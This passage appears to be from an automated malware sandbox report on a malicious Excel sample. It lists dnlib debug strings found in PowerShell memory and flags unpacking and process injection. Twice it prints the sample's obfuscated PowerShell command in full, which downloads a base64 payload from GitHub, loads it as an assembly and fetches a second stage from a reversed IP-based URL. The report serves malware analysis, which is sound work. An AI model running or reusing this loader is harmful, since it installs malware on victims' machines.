Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BKsn.pdb source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: egbrowsers.pdb source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_regbrowsers.pdbl source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: egbrowsers.pdbd source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: FC830000.0.dr Initial sample: OLE indicators vbamacros = False
Source: PO.78NO9.xls Initial sample: OLE indicators encrypted = True

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.cs .Net Code: dnso30Hnm5aN7ppryWg System.Reflection.Assembly.Load(byte[])
Obfuscated command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))" Jump to behavior
Suspicious powershell command line found
